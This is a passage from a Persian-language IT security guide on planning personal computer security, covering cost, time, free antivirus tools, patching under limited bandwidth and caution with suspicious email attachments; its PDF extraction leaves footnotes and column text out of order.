‫ﺗﺎ ﭼﻪ ﺣﺪ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟‬
‫ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟‬
‫ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬـﺎﻳﻲ ﻃـﺮﺡ ﺭﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺮﺍﻱ‬
‫ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟‬
‫ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟‬
‫ﭼﻨﺪ ﺭﺍﻫﻜﺎﺭ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘـﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﻪ ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﭼﻨﺪﺍﻧﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ ﻭ ﺗﺠﻬﻴـﺰﺍﺕ ﻻﺯﻡ ﻧﻴـﺰ ﺁﻧﭽﻨـﺎﻥ ﮔﺮﺍﻧﻘﻴﻤـﺖ‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺣﺘﻲ ﻭﻳـﺮﻭﺱ ﻳﺎﺑﻬـﺎ‪ ٥‬ﻛـﻪ ﺭﺍﻳﺠﺘـﺮﻳﻦ ﻛـﺎﻻﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻫﺴﺘﻨﺪ ﺩﺭ ﻗﺎﻟﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ‪ ٦‬ﺩﺭ ﺩﺳـﺘﺮﺱ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺷــﺎﻳﺎﻥ ﺫﻛــﺮ ﺍﺳــﺖ ﻛــﻪ ﻓﻬﺮﺳــﺖ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺭﺍﺋــﻪﻛﻨﻨــﺪﺓ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﺋﻢ ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟‬
‫ﻣﺴﻠﻤﹰﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻭ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺁﻥ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧـﻮﺩ‬
‫ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ‪ ،‬ﺍﻣﺎ ﻣﻴﺰﺍﻥ ﺍﻳﻦ ﺯﻣـﺎﻥ ﺯﻳـﺎﺩ ﻧﻴـﺴﺖ‪ .‬ﺩﺭ ﺍﻳـﻦ‬
‫ﺧﺼﻮﺹ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴـﺪ ﻭ‬
‫ﺳﭙﺲ ﻭﻇﺎﻳﻒ ﺣﻔﺎﻇﺘﻲ ﻣﻌﻤﻮﻝ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﺑﻪ‬
‫ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻴﺪ‪.‬‬
‫ﺗﺎ ﭼﻪ ﺣﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟‬
‫ﻣﻴﺰﺍﻥ ﻣﺸﻜﻼﺕ ﺑﻪ ﺩﻳﺪﮔﺎﻩ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺁﻧﭽﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻫﺮﮔـﺰ ﻧﺒﺎﻳـﺪ ﻓﻜـﺮ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﻫﺮ ﭼﻴﺰﻱ ﺩﺭ ﻧﻮﻉ ﺧﻮﺩ ﻭﺍﺟﺪ ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻣﺜـﺎﻝ‬
‫ﺍﮔﺮ ﺷﺨﺼﻲ ﺩﺭ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺿـﻤﻴﻤﻪﺍﻱ‬
‫‪Virus Scanners‬‬
‫‪Freeware‬‬
‫‪5‬‬
‫‪6‬‬
‫ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘـﻲ‪،‬‬
‫ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟‬
‫ﺑﻠﻪ؛ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺎﻳﺪ ﻋﻤﻠﻜـﺮﺩ ﺧـﻮﺩ ﺭﺍ ﺗـﺎ ﺣـﺪﻭﺩﻱ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪ .‬ﺍﻧﺘﺨﺎﺏ ﻃﺮﺣﻲ ﺑـﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﺑﻴـﺸﺘﺮ‪ ،‬ﺷـﻤﺎ ﺭﺍ ﺑـﻪ‬
‫ﺁﮔﺎﻫﻲ ﺑﻴﺸﺘﺮ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ‪ -‬ﻛﻪ ﺑﺎﻳﺪ ﺗﺎ ﺣﺪ ﺍﻣﻜـﺎﻥ‬
‫ﺍﺯ ﺑﺮﻭﺯ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ ‪ -‬ﻣﻲﺭﺳﺎﻧﺪ‪ .‬ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ‬
‫ﺟﺪﻳﺪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺬﺍﺏ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧـﺪ‪ ،‬ﺍﻣـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ‪-‬‬
‫ﺧﺼﻮﺻﹰﺎ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﺑﺮﺍﻱ ﮔﺴﺘﺮﺵ ﺷﺒﻜﻪ ﻭ ﺍﺭﺳـﺎﻝ ﻭ ﺩﺭﻳﺎﻓـﺖ‬
‫ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ‪ -‬ﺑﺎﻋﺚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ‬
‫ﻣﻲ ﮔﺮﺩﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﻣﻮﺭﺩ ﻧﻈﺮ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭﻟـﻲ ﺑـﺮﺍﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﻻﺯﻡ ﺑﺎﺷـﺪ ﻛـﻪ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺧـﺎﺹ ﺁﻧـﺮﺍ‬
‫‪ download‬ﻭ ﺑﺮ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺍﺟﺮﺍ ﻛﻨﻴﺪ‪ .‬ﺍﮔـﺮ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﺍﻋﺘﻤﺎﺩ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻳﺪ‬
‫ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺁﻥ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺑـﻪ‬
‫ﺍﺭﻣﻐﺎﻥ ﺑﻴﺎﻭﺭﺩ ﺻﺮﻓﻨﻈﺮ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺁﻳﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻃﺮﺡ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻳﺎ ﺑـﺮﺍﻱ‬
‫ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟‬
‫ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﻣﺴﺌﻮﻝ ﺗﻤﺎﻡ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺘﻲ ﺳﻴـﺴﺘﻢ‬
‫ﺧﻮﺩ ﻫﺴﺘﻴﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺘﺮ ﺍﻧﺠـﺎﻡ‬
‫ﺷﺪﻥ ﻛﺎﺭ ﺍﺯ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫•‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻭﺻـﻠﻪﻫـﺎﻱ‪ ٧‬ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻛـﻪ‬
‫ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴـﺖ ﺍﺳـﺖ ﺑـﻪ ﭘﻬﻨـﺎﻱ‬
‫ﺑﺎﻧﺪ‪ ٨‬ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑـﺮﺍﻱ ﻛـﺴﻲ‬
‫ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﺪﻩ ﻭ ﺳﺮﻋﺖ ﺍﺭﺗﺒﺎﻁ ﻭﻱ ﺩﺭ ﺣﺪ‬
‫ﻣﮕﺎﺑﺎﻳﺖ ﺍﺳﺖ ﻣﺸﻜﻠﺴﺎﺯ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﺩﺭ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﺷﺪﺕ ﻣﺤـﺪﻭﺩ ﻭ ﺑـﺴﻴﺎﺭﻱ‬
‫ﺍﻭﻗﺎﺕ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﺍﺳﺖ ﻭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ‬
‫‪Patches‬‬
‫‪Bandwidth‬‬
‫‪7‬‬
‫‪8‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺳﺆﺍﻻﺕ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﻫﺴﺘﻨﺪ؛ ﭼﺮﺍﻛﻪ ﺷﻤﺎ‬
‫ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺎﺯ ﺑﻪ ﺗﺨﻤﻴﻦ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﻫﺰﻳﻨﻪ‬
‫ﻭ ﺯﻣﺎﻥ ﻻﺯﻡ ﻭ ﻧﻴﺰ ﻣﺸﻜﻼﺕ ﺟـﺎﻧﺒﻲ ﺁﻥ ﺩﺍﺭﻳـﺪ‪ .‬ﺑـﺪﻭﻥ ﻭﺟـﻮﺩ‬
‫ﭼﻨﻴﻦ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨـﺪ ﺩﭼـﺎﺭ ﻧﺎﺍﻣﻴـﺪﻱ‬
‫ﺷﻮﻳﺪ؛ ﻳﺎ ﭘﺮﻭﮊﺓ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﻟﻐﻮ ﻧﻤـﻮﺩﻩ ﻭ ﺳـﭙﺲ ﺧـﻮﺩ ﺭﺍ ﺑـﺪﻭﻥ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺑﻴﺎﺑﻴﺪ‪ .‬ﺩﺭ ﺍﺩﺍﻣـﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﻳـﻚ ﺍﺯ ﻣـﻮﺍﺭﺩ ﺗﻮﺿـﻴﺢ‬
‫ﺑﻴﺸﺘﺮﻱ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﺑـﺎﺯﻛﺮﺩﻥ ﻭ ﻳـﺎ ﺑـﺎﺯ ﻧﻜـﺮﺩﻥ ﺁﻥ‬
‫ﺗﺼﻤﻴﻢ ﮔﻴﺮﻱ ﻛﻨﻴﺪ‪ .‬ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﻁ ﺩﺭ ﺯﻧﺪﮔﻲ ﺭﻭﺯﻣـﺮﻩ ﻧﻴـﺰ‬
‫ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭ ﺧﻮﺷـﺎﻳﻨﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺍﮔـﺮ‬
‫ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻋﺒـﻮﺭ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ ﻻﺯﻡ‬
‫ﺍﺳﺖ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻣﺮﺍﻗﺐ ﺁﻣﺪ ﻭ ﺭﻓﺖ ﻣﺎﺷﻴﻨﻬﺎ ﺑﺎﺷﻴﺪ‪.‬‬
‫‪٥٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺑﺮﺍﻱ ﺑﺎﺯﻩﻫﺎﻱ ﻃﻮﻻﻧﻲﻣﺪﺕ ﻫﻢ ﻣﻘـﺮﻭﻥ‬
‫ﺑﻪ ﺻﺮﻓﻪ ﻧﻴﺴﺖ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺑﻬﺘﺮ‬
‫ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﺭﺍ ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻛـﺮﺩﻩ‬
‫ﻭ ﻧــﺴﺨﻪﻫــﺎﻱ ‪ download‬ﺷــﺪﺓ ﺁﻧﻬــﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ‬
‫ﻻ‬
‫ﺩﻳﮕــﺮﺍﻥ ﻗــﺮﺍﺭ ﺩﻫــﺪ‪ .‬ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﻣﻌﻤــﻮ ﹰ‬
‫ﻣﺸﻜﻠﺘﺮ ﺍﺯ ‪ download‬ﻛـﺮﺩﻥ ﻣـﺴﺘﻘﻴﻢ ﺗﻮﺳـﻂ ﻫـﺮ‬
‫ﻛﺎﺭﺑﺮ ﺍﺳﺖ؛‬
‫•‬
‫ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪ ﺍﻱ ﺩﺭ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ‬
‫ﻻ ﻧﺴﺒﺖ ﺑﻪ ﭼﻨـﻴﻦ‬
‫ﻛﻤﻚ ﻣﻲﻛﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺣﺴﺎﺳﻴﺖ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﻳـﻚ ﻛـﺎﺭﺑﺮ‬
‫ﻻ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﻛﺎﻣـﻞ ﺁﻥ ﻭ‬
‫ﻫﺸﺪﺍﺭﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻣﻌﻤﻮ ﹰ‬
‫‪٩‬‬
‫ﻣﺘﻌﺎﻗﺒﹰﺎ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﻣـﺸﻜﻞﺁﻓـﺮﻳﻦ ﺩﺭﻳﺎﻓـﺖ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﺍﺩﻋﺎ ﺩﺍﺭﺩ ﻳﻚ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ‬
‫ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺷﺎﻣﻞ ﺿﻤﻴﻤﺔ "‪ "Update‬ﺍﺳﺖ ﻭﻟﻲ ﺑﺎﻳـﺪ‬
‫ﻻ ﺿﻤﻴﻤﻪﻫﺎﻱ ﺍﻳﻦ ﻧﺎﻣـﻪﻫـﺎ‬
‫ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﭼﻴﺰﻱ ﺟﺰ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻄﺮﻧﺎﻙ ﻧﻴﺴﺘﻨﺪ؛ ﻭ‬
‫•‬
‫ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ‬
‫)ﻣﺮﺍﻛــﺰ ﻛــﺎﺭﻱ‪ ،‬ﻣــﺪﺍﺭﺱ‪ ،‬ﺍﺩﺍﺭﻩﻫــﺎﻱ ﺩﻭﻟﺘــﻲ( ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ‬
‫ﺷﺨﺼﻲ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ‪ ١٠‬ﺟﻬﺖ ﺍﻋﻤﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪.‬‬
‫ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺩﻳﮕـﺮﺍﻥ‬
‫ﻧﻴﺰ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ ﺗﻌﺎﻣـﻞ ﻣﻨﺎﺳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ‬
‫ﺩﻳﮕﺮ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺸﺨﺺ‬
‫ﻛﺮﺩﻥ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﮔﺮﻭﻫﻬﺎﻱ ﻳﻚ ﻳﺎ‬
‫ﭼﻨﺪ ﻧﻔﺮﻩ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪.‬‬
‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓﺮﺩﻱ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪ .‬ﺍﻛﻨﻮﻥ ﻛﻪ ﺷﻤﺎ ﻣﻔﻬﻮﻡ ﺧﻄﺮﺍﺕ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩ ﻭ ﺩﺭ‬
‫ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧـﺪ‬
‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﻗﺎﺩﺭ ﻫﺴﺘﻴﺪ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓـﺮﺩﻱ ﺭﺍ‬
‫ﺑــﻪ ﺍﺟــﺮﺍ ﺩﺭ ﺁﻭﺭﻳــﺪ‪ .‬ﭘــﺲ ﺍﺯ ﺍﺭﺯﻳــﺎﺑﻲ ﻗﻴﻤﺘﻬــﺎ‪ ،‬ﺯﻣــﺎﻥ ﻻﺯﻡ ﻭ‬
‫‪۹‬‬
‫ﻫﺮﭼﻨﺪ ﺑﺎ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺟﺎﻣﻌـﻪ‪ ،‬ﺍﻳـﻦ ﻭﺿـﻊ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪System Administrator‬‬
‫‪10‬‬
‫ﺩﺭﺩﺳﺮﻫﺎﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠـﻪ ﺑﺮﺳـﻴﺪ ﻛـﻪ‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺑﻌﻀﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺯﻣـﺎﻥ ﺣﺎﺿـﺮ ﺿـﺮﻭﺭﻱ‬
‫ﻧﻴﺴﺖ‪ .‬ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﺎﺻﻲ ﺗﻜﻴﻪ‬
‫ﻣﻲﻛﻨﺪ ﺍﻣـﺎ ﻛﻤﺎﻛـﺎﻥ ﺑﺎﻳـﺪ ﻓﺮﺁﻳﻨـﺪ ﻫـﺎ‪ ،‬ﻗـﻮﺍﻧﻴﻦ‪ ،‬ﻭ ﻣﻼﺣﻈـﺎﺕ‬
‫ﺷﺨﺼﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺍﺯ ﻻﻳﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ ﻭ‬
‫ﻫﺮ ﻻﻳﻪ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑـﺮﺩ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﺍﺯ‬
‫ﻻﻳــﻪﻫــﺎﻱ ﻣﺨﺘﻠــﻒ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ ﻣــﺴﻠﻤﹰﺎ ﺩﺭ ﭘﻴــﺸﮕﻴﺮﻱ ﺍﺯ‬
